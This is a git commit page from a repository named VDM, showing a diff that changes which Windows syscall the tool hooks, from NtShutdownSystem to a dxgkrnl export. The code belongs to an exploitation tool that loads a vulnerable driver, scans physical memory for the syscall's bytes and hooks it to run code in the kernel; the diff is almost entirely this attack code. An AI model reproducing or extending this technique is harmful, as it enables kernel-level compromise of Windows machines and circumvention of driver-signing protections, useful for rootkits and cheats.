IDontCode
/
VDM
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

changed from NtShutdownSystem to a dxgkrnl export

Browse Source
merge-requests/1/head
xerox 4 years ago
parent 4a9b03aafa
commit e52add0a3e
3 changed files with 15 additions and 12 deletions
Show Stats Download Patch File Download Diff File

2
VDM/main.cpp
Unescape View File

@ -29,8 +29,8 @@ int __cdecl main(int argc, char** argv)
ntoskrnl_base, ntoskrnl_base,
sizeof mz_bytes sizeof mz_bytes
); );
std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
if (!vdm::unload_drv(drv_handle, drv_key)) if (!vdm::unload_drv(drv_handle, drv_key))
{ {
std::printf("[!] unable to unload vulnerable driver...\n"); std::printf("[!] unable to unload vulnerable driver...\n");

17
VDM/vdm_ctx/vdm_ctx.cpp
Unescape View File

@ -4,18 +4,19 @@ namespace vdm
{ {
vdm_ctx::vdm_ctx() vdm_ctx::vdm_ctx()
{ {
LoadLibraryA("user32.dll"); // required for win32u.dll...
vdm::dxgkrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryEx("drivers\\dxgkrnl.sys", NULL,
DONT_RESOLVE_DLL_REFERENCES));
nt_rva = reinterpret_cast<std::uint32_t>( nt_rva = reinterpret_cast<std::uint32_t>(
util::get_kernel_export( util::get_kernel_export(
"ntoskrnl.exe", "dxgkrnl.sys",
syscall_hook.first, syscall_hook.first,
true true
)); ));
nt_page_offset = nt_rva % PAGE_4KB; vdm::nt_page_offset = nt_rva % PAGE_4KB;
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryEx("ntoskrnl.exe", NULL,
DONT_RESOLVE_DLL_REFERENCES));
// for each physical memory range, make a thread to search it // for each physical memory range, make a thread to search it
std::vector<std::thread> search_threads; std::vector<std::thread> search_threads;
for (auto ranges : util::pmem_ranges) for (auto ranges : util::pmem_ranges)
@ -50,7 +51,7 @@ namespace vdm
// check the first 32 bytes of the syscall, if its the same, test that its the correct // check the first 32 bytes of the syscall, if its the same, test that its the correct
// occurrence of these bytes (since ntoskrnl is loaded into physical memory at least 2 times now)... // occurrence of these bytes (since ntoskrnl is loaded into physical memory at least 2 times now)...
if (!memcmp(page_data + nt_page_offset, ntoskrnl_buffer + nt_rva, 32)) if (!memcmp(page_data + nt_page_offset, dxgkrnl_buffer + nt_rva, 32))
if (valid_syscall(reinterpret_cast<void*>(address + page + nt_page_offset))) if (valid_syscall(reinterpret_cast<void*>(address + page + nt_page_offset)))
syscall_address.store( syscall_address.store(
reinterpret_cast<void*>( reinterpret_cast<void*>(
@ -67,7 +68,7 @@ namespace vdm
static const auto proc = static const auto proc =
GetProcAddress( GetProcAddress(
GetModuleHandleA(syscall_hook.second), LoadLibraryA(syscall_hook.second),
syscall_hook.first syscall_hook.first
); );

8
VDM/vdm_ctx/vdm_ctx.h
Unescape View File

@ -10,13 +10,15 @@
namespace vdm namespace vdm
{ {
constexpr std::pair<const char*, const char*> syscall_hook = { "NtShutdownSystem", "ntdll.dll" }; // change this to whatever you want :^)
constexpr std::pair<const char*, const char*> syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" };
inline std::atomic<bool> is_page_found = false; inline std::atomic<bool> is_page_found = false;
inline std::atomic<void*> syscall_address = nullptr; inline std::atomic<void*> syscall_address = nullptr;
inline std::uint16_t nt_page_offset; inline std::uint16_t nt_page_offset;
inline std::uint32_t nt_rva; inline std::uint32_t nt_rva;
inline std::uint8_t* ntoskrnl_buffer; inline std::uint8_t* dxgkrnl_buffer;
class vdm_ctx class vdm_ctx
{ {
@ -27,7 +29,7 @@ namespace vdm
{ {
static const auto proc = static const auto proc =
GetProcAddress( GetProcAddress(
GetModuleHandleA(syscall_hook.second), LoadLibraryA(syscall_hook.second),
syscall_hook.first syscall_hook.first
); );

Write Preview
Loading…
Cancel
Save